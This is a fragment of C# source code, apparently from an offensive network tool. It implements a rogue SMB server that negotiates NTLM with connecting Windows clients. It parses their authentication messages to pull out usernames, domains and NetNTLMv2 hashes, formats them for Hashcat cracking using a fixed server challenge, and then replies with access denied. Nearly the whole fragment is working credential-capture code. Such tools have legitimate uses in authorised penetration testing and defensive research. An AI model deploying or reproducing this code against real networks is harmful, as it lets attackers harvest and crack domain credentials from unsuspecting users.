private async Task ReadCallback(IAsyncResult asyncResult) { try { // Retrieve the state object and the handler socket // from the asynchronous state object. SMBPacket state = (SMBPacket)asyncResult.AsyncState; Socket handler = state.Socket; // Read data from the client socket. int bytesRead = 1;//handler.EndReceive(ar); if (bytesRead > 0) { if (state.Buffer[8].Equals(SMB2Commands.SMB1NegotiateToSMB2)) { await NegotiateSMB1ToSMB2Response(state); } else if (state.Command.SequenceEqual(SMB2Commands.Request)) { await NegotiateResponse(state); } else if (state.Command.SequenceEqual(SMB2Commands.NegotiateNTLM) && state.MessageID.SequenceEqual(new byte[] { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })) { await NegotiateNTLMResponse(state); } else if (state.Command.SequenceEqual(SMB2Commands.NegotiateNTLM) && state.MessageID.SequenceEqual(new byte[] { 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })) { await ParseHash(state); await SendAccessDenied(state); if (handler.Connected) { handler.EndReceive(asyncResult); handler.Shutdown(SocketShutdown.Both); } return; } try { handler.BeginReceive(state.Buffer, 0, SMBPacket.BUFFER_SIZE, 0, new AsyncCallback(async(ar) => await ReadCallback(ar)), state); } catch (ObjectDisposedException) { } } } catch (SocketException e) { await Controller.Log(Name, e.Message); } }
private async Task NegotiateSMB1ToSMB2Response(SMBPacket packet) { try { var header = new SMB2Header(new byte[] { 0x00, 0x00 }); var data = new SMB2NegotiateResponse(header.Build()).Build(); await Send(packet.Socket, data); } catch (Exception e) { await Controller.Log(Name, e.ToString()); } }
private async Task ParseHash(SMBPacket packet) { var auth = packet.Buffer.Skip(113).ToArray(); short lmHashLen = BitConverter.ToInt16(auth, 12); short lmHashOffset = BitConverter.ToInt16(auth, 16); var lmHash = BitConverter.ToString(auth.Skip(lmHashOffset).Take(lmHashLen).ToArray()).Replace("-", ""); var ntHashLen = BitConverter.ToInt16(auth, 22); short ntHashOffset = BitConverter.ToInt16(auth, 24);; var ntHash = BitConverter.ToString(auth.Skip(ntHashOffset).Take(ntHashLen).ToArray()).Replace("-", ""); short domainLen = BitConverter.ToInt16(auth, 30); short domainOffset = BitConverter.ToInt16(auth, 32); string domain = Encoding.Unicode.GetString(auth.Skip(domainOffset).Take(domainLen).ToArray()); short userLen = BitConverter.ToInt16(auth, 38); short userOffset = BitConverter.ToInt16(auth, 40); string user = Encoding.Unicode.GetString(auth.Skip(userOffset).Take(userLen).ToArray()); await Controller.Add(Name, new User { IPAddress = (packet.Socket.RemoteEndPoint as IPEndPoint).Address.ToString(), Username = user, Hash = "NetNTLMv2", HashcatFormat = string.Format( "{0}::{1}:{2}:{3}:{4}", user, domain, "6769766563707223", string.Concat(ntHash.Take(32)), string.Concat(ntHash.Skip(32)) ) }); /* * await Controller.Add(Name, new User * { * IPAddress = context.Request.RemoteEndPoint.Address.ToString(), * Username = user, * Hash = string.Format("{0}:{1}", String.Concat(ntHash.Take(32)), string.Concat(ntHash.Skip(32))), * HashcatFormat = "" * }); */ }
private async Task SendAccessDenied(SMBPacket packet) { try { var header = new SMB2Header( new byte[] { 0x01, 0x00 }, packet.MessageID, packet.CreditCharge, packet.Credits, new byte[] { 0xff, 0xfe, 0x00, 0x00 }, packet.SessionID, new byte[] { 0x22, 0x00, 0x00, 0xc0 } ); var data = new SMB2AccessDenied(header.Build()).Build(); await Send(packet.Socket, data); } catch (Exception e) { await Controller.Log(Name, e.ToString()); } }
private async Task NegotiateResponse(SMBPacket packet) { try { var header = new SMB2Header( new byte[] { 0x00, 0x00 }, packet.MessageID, packet.CreditCharge, packet.Credits, packet.ProcessID ); var data = new SMB2NegotiateResponse( header.Build(), new byte[] { 0x10, 0x02 }).Build(); await Send(packet.Socket, data); } catch (Exception e) { await Controller.Log(Name, e.ToString()); } }
private async Task AcceptCallback(IAsyncResult asyncResult) { try { // Signal the main thread to continue. mre.Set(); // Get the socket that handles the client request. Socket listener = (Socket)asyncResult.AsyncState; Socket handler = listener.EndAccept(asyncResult); // Create the state object. SMBPacket state = new SMBPacket(); state.Socket = handler; handler.BeginReceive(state.Buffer, 0, SMBPacket.BUFFER_SIZE, 0, new AsyncCallback(async(ar) => await ReadCallback(ar)), state); await Task.CompletedTask; } catch (Exception e) { await Controller.Log(Name, e.ToString()); } }